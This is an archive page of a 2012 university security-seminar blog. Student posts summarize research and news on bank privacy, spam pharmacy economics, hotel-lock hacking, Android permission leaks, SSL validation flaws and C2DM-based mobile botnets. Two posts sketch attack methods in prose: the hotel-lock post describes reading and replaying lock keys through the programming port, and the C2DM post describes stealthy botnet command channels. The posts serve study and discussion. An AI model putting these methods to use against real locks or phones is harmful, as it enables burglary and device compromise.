Rice University logo
 
Top blue bar image
A graduate seminar: current topics in computer security
 

Archive for the ‘Articles’ Category


Bank of America Security Hole

November 29th, 2012 by ksl3

https://www.privateinternetaccess.com/blog/2012/11/even-a-vpn-service-cant-protect-your-privacy-if-youre-using-bank-of-america/

This is an article describing a flaw in Bank of America’s privacy system.
Bank of America lets customers have full access to their account and account details with a phone and social security number.
Phone numbers are easy to get nowadays and don’t warrant a discussion; social security numbers are also increasingly common (any business that pays an individual more than $600 a year needs the individual to sign an IRS W-9 form which includes a social security number).

While the digital age has enabled an unprecedented way of storing and retrieving large amounts of data, it has also led to some unfortunate consequences like the death of privacy.
I don’t believe that the lack of privacy is an inherent problem with the present technologies but rather the attitude and policies that vendors and consumers continue to hold about personal data.
It’ll be interesting to see in the next 10 years where the trend in individual privacy and the security around that will go.

Understanding the economy of Online Affiliate Programs key to fight against them

November 28th, 2012 by kb20

A USENIX 2012 security video [1] provides a rare glimpse into how the online affiliate programs work. Understanding their economy may be the key to controlling these programs. In this paper they analyze leaked data from three affiliate programs online which amounts to 185M in gross revenue, 1M+ customers, 1.5M+ purchases, and 2600+ affiliates. First, I will provide brief introduction of online affiliate programs. Next, I will present the findings of the USENIX paper, followed the discussion of ideas on how the government could control or get rid of these programs altogether.

Most of us have come across unsolicited emails advertising different types of drugs. But, what we may all not know is this is a part of a full fledged underground economy which has business that functions much like the normal businesses – they keep track of financial records, revenue, cost etc. First player in this economy is the customer, the receiver of the spam email who may turn around and buy drugs online. Next player, is the affiliate marketer, who sent the spam email to begin with. Once, the customer decides to click on the link, the affiliate marketer is out of the game and the transaction is handled from that point on by the affiliate supplier which has staffs for customer service. The affiliate supplier however relies on another entity for payment processing. In general, these affiliate programs like to retain customers. So, they try to keep them happy by promptly addressing any of their concern.

The customers are usually people who are trying to save money by buying cheaper drugs online. The affiliate marketers are mostly spammers who own botnets. They work purely on commission based on the volume of traffic that they generate to the site.  Some affiliate program apply screening process to recruit best affiliate marketers while others let anybody join as it does not cost the program anything – they work on pure commission. The payment service providers (PSP) charges a fee each time based on the value of the transaction (~10%). The shipping and handling is around 11.5% of the transaction. The cost of actual item is only around 7% percent of the transaction. After, 30% pain in commission to the marketing affiliate and other costs of operating a business, their average actual profit margin is around 16% and 30% in a highly optimistic case.

From the analysis of the data, they found out that 95% of the customers are from US, Canada, Australia and Europe. Erectile dysfunction drugs make 75% of the orders and generate 80% of the revenue. An interesting fact they found out was that between 2010 and 2011, one of the affiliate programs, RX Promotion’s relation with PSP went sour. This resulted in sharp decline in its profit to the point where it was about to close. No payment means they cannot take any new customer nor can they keep the affiliate spammers. Another point to note here is that three PSP processed 84% of the transactions for all three affiliate programs. Next important insight is that 10% of the affiliates accounted for the 80% of the revenue for these affiliate programs. Most affiliates failed with a median revenue  of US$ 350/year. However, the top earners like the operators of Rustock earned US$ 1.9M, and Scorrp2 earned US$3M. The affiliate with the largest revenue, webplanet, earned US$ 4.6M, through web-based advertising.

To, summarize, if we have any hope of fighting these affiliate programs that sell fake or unauthorized drugs online, we have to first cut their life line which is their connection to PSPs. And, since there are only handful of the PSPs that do majority of the processing, it is a cost-effective move. As we saw, a handful of affiliates generate most of the revenue, the most cost effective way curb this industry is to direct operations against these “big player” affiliates.

 

References:

[1] https://www.usenix.org/conference/usenixsecurity12/pharmaleaks-understanding-business-online-pharmaceutical-affiliate

Full disclosure in the real world

November 27th, 2012 by bss4

If full disclosure of lock picking aroused the ire of lock smiths in the past, it still does. Here are Andy Greenberg’s (Forbes reporter on security related issues) reports on (1) a blackhat presentation by Cody Brocious on exploiting a certain brand of hotel locks, dated 23rd July, 2012, and (2) dated 26th Novermber 2012, a recent robbery from a famous hotel in, yes, Houston! What is the connection, you might ask. Investigation authorities suspect the alleged thief to have used techniques from (1) to break into multiple rooms in the hotel.

The blackhat presentation discloses the technical details of hacking the locks by plugging an active probe into a small hole under the digital locks (meant for DC power supply and to insert a portable programmer for programming the lock) and reading the key. Bear in mind that the PP (Portable Programming) slot is openly accessible, not hidden under the lock panel. An attacker would simply need to walk up to the victim’s door, plug an arduino board (imitating the portable programmer that hotel staff use) to the PP slot and initiate communication with the lock, specifically effecting the lock to give out the key to open it! It turns out that this brand of locks stores keys in memory and no authentication is required for the read memory command. So, if one knows where keys are stored, it is not difficult for an attacker to read the key and simply replay it to open the lock.

It is suspected the the robbery took place using this type of intrusion; apparently opening the door using the PP slot leaves a trace (thanks to good old auditing mechanisms), which made the investigation authorities link the theft to material in the blackhat talk. This incident raises questions about who is right and who is wrong? It is evident that full (not responsible) disclosure led to a robbery in which a lady lost her laptop. Why didn’t Cody Brocious, the blackhat researcher, disclose the flaw to the lock making firm? Let’s suppose that he did. Do you think the firm would go about upgrading millions of installed locks that are in hotels around the world or would they simply feel, ‘No harm is going to happen if nobody knows it’, the basis for security by obscurity. Now that the firm has a fix, they are charging customers for their own hardware upgrades? Isn’t it their obligation to fix it for free; it’s not a feature upgrade we are talking about, it is simply about doing what locks are supposed to.

What can the affected hotels do, you ask? Either pay up for the “upgrade” or go low tech: plug the PP slot with a cap or some gooey concoction they use to fill holes in walls.

More confused deputies

November 7th, 2012 by bss4

I started following blogs listed on the course blog’s information security links of which this Russian blog is a part. The blog reported on a recently discovered capability leak on several Android phones by a group of researchers at NC State University. Let’s look into the issue in a little more detail.

Capability leak

Let’s start by defining a capability leak. Think of capabilities as Android permissions. Now let’s say system app A (e.g., Android’s messaging app) acts as a deputy to third-party apps wanting to send SMSs via app A i.e., while a third-party app B can request app A to send a particular SMS message to an outbound number, it does not have the authority to do so by itself. Since sending SMS is a security critical functionality, one would expect app A to check if app B has the required SEND_SMS permission before it acts on app B’s behalf. If app A does do the required check, it guards its privilege (capability) of sending an SMS. Otherwise, there is a privilege (capability) leak allowing virtually any app without the requisite permissions to send SMSs via app A.

The attack

A description of the attack itself is linked earlier in this article. To summarise, it has been found that the WRITE_SMS permission (call it capability) is being leaked. In the extreme case, this means that an app without WRITE_SMS permission (or no requested permissions at all) could write a fake SMS via the system messaging app. Not surprisingly, this could be used for phishing end-users; it seems fashionable to call it “Smishing”, short for SMS Phishing.

While such a leak is not new (the first description of the problem dates back to Hardy’s article published in the year 1988), the fact that something seemingly evident such as the WRITE_SMS permission leak has not been brought to notice before is alarming. More so, the attack is claimed to be deployable on the latest and greatest version of Android OS (and prior versions as well) and across phones from multiple OEMs.

More to come?

Researchers who discovered the leak have published a paper earlier this year about the framework they built to automatically discover capability leaks in the Android source code (AOSP). Although this particular leak finds no mention in the paper, it seems as though the leak was found in the process of experimenting with their framework (Woodpecker) and probing for more leaks. It shouldn’t be surprising if more leaks are uncovered.

Having said that the framework built by the researchers has several limitations: (1) It does not consider capability leaks in C code; Android has a significant native code base, (2) It does not consider the case where multiple malicious applications can collude to achieve the same end-result as that of capability leaks, and (3) It only scans for leaks of 13 out of more than 200 default Android permissions and only in those cases where the originator of the leak is a pre-loaded app (apps in the stock image); it is realistic for third-party apps to be doing the same thing.

Article: SSL Vulnerabilities Found in Critical Non-Browser Software Packages

October 25th, 2012 by Martha

Michael Mimoso’s article today at Threat Post summarized a recent ACM CCS ’12 paper that examined just how well SSL certificate validation is  implemented in a variety of applications. (Hint: not well.)

From the paper:
“SSL certificate validation is completely broken in many critical software applications and libraries” – so broken that “any SSL connection from any of these programs is insecure against a man-in-the-middle attack” [1].

Much of the affected software the paper-writers found dealt with money – eg Amazon and Paypal. However, the worst bug award goes to Chase’s Android mobile banking app, as even some guy with an evil Wi-Fi access point can steal Chase banking credentials.

The article does an ok job of covering the paper, but it does say some silly things – like “the death knell for SSL is getting louder” [2]. The SSL protocol itself is fine. Even the libraries implementing SSL are fine [1].
Instead, the paper claims that poorly designed developer-facing SSL library APIS are at fault, as they “expose low-level details of the SSL protocol” that confuse developers. Additionally, it ignores the helpful advice section at the end of the paper for developers.

While the paper itself is solid, several readers disagreed that that whole API is at fault.

Comments left on the article’s Slashdot post [3] brought up the fact that many SSL libraries, such as OpenSSL, are poorly documented, and that the whole API might not totally be at fault. Additionally, a comment on the article further highlights that “this isn’t a problem with the SSL API” – instead, it is a “problem with the lack of a standard mechanism” for SSL certificate management – the API “provides hooks for connecting for connecting to a certificate manager instead of providing” one.

More cool stuff related to the paper can be found at Georgiev’s website under Publications here: https://www.cs.utexas.edu/~georgiev/publications.php.

[1] M. Georgiev, R. Anubhai, S. Iyengar, D. Boneh, S. Jana, V. Shamatikov. The Most Dangerous Code in the World: Validating SSL Certificates in Non-Browser Software. ACM CCS 2012. http://www.cs.utexas.edu/~shmat/shmat_ccs12.pdf

[2] http://threatpost.com/en_us/blogs/ssl-vulnerabilities-found-critical-non-browser-software-packages-102512

[3] http://it.slashdot.org/story/12/10/25/2020223/ssl-holes-found-in-critical-non-browser-software

X-Ray for Android

October 17th, 2012 by bss4

X-Ray is an Android app developed by Duo Security (http://www.duosecurity.com/) that scans your device for vulnerabilities that could be potentially exploited. It focuses on privilege escalation vulnerabilities: the sorts that would make the attacker root.

App scanning vs. system scanning:

X-Ray does not scan apps, it scans the device’s firmware (or ROM) comprising, among other things,  the underlying kernel, third-party native libraries and any system binaries.


Source: http://www.arm.com/images/androidStack.jpg

In Android’s software stack (see picture), this means the linux kernel, certain library components e.g., WebKit, libc among other things. System binaries that are utilitarian in nature e.g., logcat, adb are also part of the ROM that X-Ray app scans.

As one can see, it is clear that X-Ray chooses a different layer of the software stack altogether to scan for vulnerabilities. Mobile anti-virus apps rely on scanning applications per se while X-Ray scans the underlying system software whose vulnerabilities the malicious apps exploit. The argument put forward by the authors of X-Ray is that fingerprinting malicious apps can get out of hand considering the fact that slightly different variants of known malware are engineered on a regular basis and catching up with this not only requires time and effort but does not do a good job: malware that has not been fingerprinted yet can evade anti-virus checks. Note that there are a large number of app developers whose code needs to be fingerprinted and on a platform like Android, the inertia for becoming a developer being low, anyone/everyone could be an app developer.

Accountability:

On the other hand, system software (kernel, open-source libraries etc.) operate in a more controlled environment: people who maintain these things are fewer in number albeit distributed. For instance, issues in Android’s linux kernel ought to be tracked by Google, OEM’s like Samsung and/or Carriers such as T-Mobile; open-source libraries are maintained by known entities whose responsibility it is to track and resolve known (security) bugs. This means that, unless a vulnerability is solely at the application layer, one could attribute a given security bug to a known entity where the bug exists. From then on, it’s the entity’s responsibility to fix this bug and not let malware writers exploit it. In contrast, classical anti-virus solutions only tell the end-user if an app is malicious or not; the blame is solely on the app developer. The end-user does not have the knowledge of where the fault for the malware lies: Is the malware writer (app developer) doing something nasty on my phone or is he/she simply exploiting a known fault in the system software?

X-Ray scans the system software and (with user’s consent) collect information on what vulnerabilities persist on a phone’s ROM. Assuming the app becomes popular with the users and many install them and consent to the app collecting security related information, it would be interesting to see if and how the blame is shared among different entities. For instance, to what extent is Carrier X to blame for not shipping a security patch for a known bug? This, in turn, could motivate a collective petition on the users’ part seeking immediate remediation from the entity who is to blame. The authors of X-Ray concede that the incentives for a given entity to expend effort pushing a patch are skewed: let’s say a device A from carrier X has a known unpatched vulnerability; while X gets to work on updating all device A’s, a new device running the latest ROM (patching the known vulnerability) is out and users have started upgrading to this new device, perhaps more due to wanting a newer phone that wanting a more secure phone. How does this incentivise X? Questions like these require a more broader study on the cost-benefit aspects of patching and patch deployment.

Conclusion:

Personally, I feel X-Ray is a step in the right direction. From their website, I gather that they have some preliminary dataset from about 20,000 Android devices that have installed their app, and they have found that over half of these have unpatched vulnerabilities. For those interested, one of the main chaps behind the app, Jon Oberheide, has an upcoming webinar next week. See http://info.duosecurity.com/webinar-mobile-vulnerabilities

On the security implications of C2DM

September 29th, 2012 by bss4

When I read about Google’s Android Cloud to Device Messaging (C2DM) framework—its successor is named Google Cloud Messaging (GCM) for Android [1] —back when it was introduced, I thought it was a security faux pas on Google’s part. In short, the GCM framework allows Android app developers to register with Google’s push notification service which allows the former to send short messages to end-user devices on which the former’s app has been installed. The message is sent from the app developer’s (remote) server via Google’s servers to the device. Conforming to Google’s open policy, there is no vetting: any app developer can choose to use GCM as long as he/she declares the relevant permissions in the manifest and the end-user approves the same during application install process. To make matters worse, attackers could simply repackage a good app, embed it with a C2DM-based channel and use the latter maliciously. In our first class presentation on [4], Lee and I spoke of how prevalent repackaging and its subsequent deployment on third-party app markets is, in the malware writers community: The study found that 86% of malicious apps found in third-party Android markets are repackaged.

With a hunch that I was right, I searched Google for “exploiting c2dm” and the first result was a paper titled “Cloud-Based Push Styled Mobile Botnets…” [2]; why not? The paper has been selected for this year’s Annual Computer Security Applications Conference (ACSAC). But first, a bit about C2DM…

C2DM

An app developer, say Charlie, signs up with C2DM by providing a username, password and the package name for his application. The following protocol ensues:

a) Charlie’s application, say its called BotMeister, registers itself with a C2DM server providing Charlie’s C2DM username and the device ID of the phone on which it is installed. Note that a device ID uniquely identifies a phone. Also, this step presupposes that BotMeister has been installed by the user who has consented to the app’s C2DM specific Android permissions [1].

b) The C2DM server provides a unique registration ID to BotMeister which identifies the device it is running on. (Are you thinking why they don’t reuse device ID?)

c) BotMeister sends the registration ID in (b) along with its C2DM username (same as Charlie’s C2DM username) to Charlie’s server. Google obviously doesn’t want Charlie’s server to know end-user’s device IDs. No wonder C2DM server generates a new Unique ID for the device.

d) Charlie authenticates to a C2DM server with his credentials after which he is handed an auth token by the server; subsequently, Charlie packages the auth token, his message and the registration ID in (b) and sends it back to the C2DM server to be relayed to a device where BotMeister is installed. Note that, Charlie can only send a message to one device at a time. GCM, however, allows multicast messages.

e) Finally, the C2DM server forwards the message to the device ID that maps to the registration ID contained in the message. If a C2DM connection is not active on the recipient,  it stores the message and sends the message when the device eventually establishes a connection.

Given the basic protocol of C2DM, it is not hard to conceive of a botnet framework built on top of it. Charlie’s BotMeister can do bad things on devices it is installed on by using information contained in a C2DM message. Firstly, the message could be a malicious payload that escalates privileges on the device; secondly, C2DM could simply be used to create and subsequently remote control bots (Charlie’s victims) from Charlie’s Control and Command (C&C) server. The paper talks of the latter. Now, a bit about the paper.

C2DM Botnet

The botnet functionality itself isn’t interesting; the authors of the paper build a botnet by the book e.g., collect user info. What is  interesting is that their framework strives to be as stealthy as possible to evade detection. Also, they attempt to make their bot design both scalable and fault tolerance.  It is stealthy in the following way: The framework cleverly modifies step (c) in the C2DM handshake protocol (preceding section) by making BotMeister communicate to Charlie’s server via a C2DM server. The idea is that, a defense to the proposed attack might inspect URLs to which BotMeister is communicating. By relaying the reply via C2DM, the recipient as seen by the device is a C2DM server, not Charlie’s.

Scalability is necessary in C2DM because, one is allowed to send at most 200,000 messages per day. GCM, however, does not have a daily quota: more the merrier. Scalability is addressed by proposing a variant of the C2DM handshake protocol where Charlie has registered with multiple usernames and uses each to create a subnet of bots.

Fault tolerance is necessary because, Google could deregister a C2DM username that is seen to be doing bad things. The scalability solution helps tolerate disruptions to a certain extent, since Charlie could use alternate usernames that have not yet been banned. Also, it is possible for Charlie to have alternate C&C servers as back up, making detection of malice more difficult.

 Prototype

The authors’ prototype is a neat example of a real-world botnet framework using C2DM. Apart from the things mentioned above, the authors present an evaluation of the prototype that shows that not only does their framework utilise resources optimally (small network bandwidth, power consumption) but also makes application of classic anomaly based intrusion detection techniques difficult because of seemingly small differences in resource usage between a normal and an infected device. For more, read the paper 🙂

Summary

C2DM/GCM for Android introduces a new attack vector in the Android ecosystem. The discussed paper provides a real-world prototype of a botnet framework based on it. Conceptually , C2DM/GCM bloats up the already unmanageable Trusted Computing Base [3] (comprising of Linux kernel and Android middleware) of Android by adding remote entities to it that engender no trust at all. Consequently, even if Google hardens their operating system, attackers can control the device remotely.

Also, Google is not the only platform that offers such a push notification service to developers. Apple, Microsoft, Blackberry and Symbian all have similar push notification frameworks that beg to be examined more closely.

References:

[1] Google Cloud Messaging for Android: http://developer.android.com/guide/google/gcm/index.html

[2] “Cloud-Based Push-Styled Mobile Botnets: A Case Study of Exploiting the Cloud to Device Messaging Service”, S. Zhao et. al., http://www.cse.cuhk.edu.hk/~pclee/www/pubs/acsac12.pdf

[3] Trusted Computing Base: Wikipedia, http://en.wikipedia.org/wiki/Trusted_computing_base

[4] “Dissecting Android Malware: Characterization and Evolution”, Y. Zhou et. al., http://www.csc.ncsu.edu/faculty/jiang/pubs/OAKLAND12.pdf